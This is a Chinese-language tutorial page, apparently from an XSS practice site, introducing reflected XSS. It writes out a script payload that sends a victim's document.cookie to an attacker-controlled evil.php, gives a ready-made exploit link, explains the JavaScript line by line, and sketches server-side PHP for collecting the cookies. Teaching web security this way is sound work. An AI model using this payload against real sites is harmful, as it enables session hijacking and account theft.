1.1 最常规的反射型XSS 


当前是第 http://xsst.sinapp.com/example/1-1.php?page=2
当然这个只是弹出cookies,只是好看而已。(弹窗一点不好看 T T,没妹子好看!) 我们的目标是将得到的cookies发送到另外一个网站。试试下面的 page=<script>location.href='http://你自己的网站/evil.php?cookie='+encodeURIComponent(document.cookie)</script> 或点以下我所提供的链接(IE8,IE9用户,而且没关XSS筛选器的)
http://xsst.sinapp.com/example/1-1.php?page=<script>location.href='http://xsst.sinaapp.com/example/evil.php?cookie='+encodeURIComponent(document.cookie)</script>
考虑到一些新手,没有JS基础,附上面这段JS代码的解释: location.href="恶意地址"; //这句话可以让当前页面(location)的地址(href),跳转到恶意地址 document.cookie //就是当前页面的cookies数据 encodeURIComponent(document.cookie) //就是将cookies数据编码一下(防止cookies中有特殊的符号,导致地址错误) location.href="恶意地址"+encodeURIComponent(document.cookie) //就是将编码后的数据加在恶意地址之后 例如: location.href='http://xsst.sinaapp.com/evil.php?cookie='+encodeURIComponent(document.cookie) 运行之后,将会跳转到 http://xsst.sinaapp.com/evil.php?cookie=编码后的COOKIES数据 我们在服务器端,只需要用以下PHP代码,就可以获得cookie数据 <? $cookie=$_GET["cookie"]; 存储($cookie); //此句是伪代码 ?>
测试最后一个代码之前,很不幸的告诉大家,这样第一章就到此结束了,希望大家对XSS有一个最基本的认识! 下一章,我们将接触更好玩的反射型的XSS! < 后退 | 前进 | 上一章节 | 下一章节 > 课外阅读: 搜狗的XSS漏洞 新浪一处存在xss漏洞 更多XSS漏洞 ...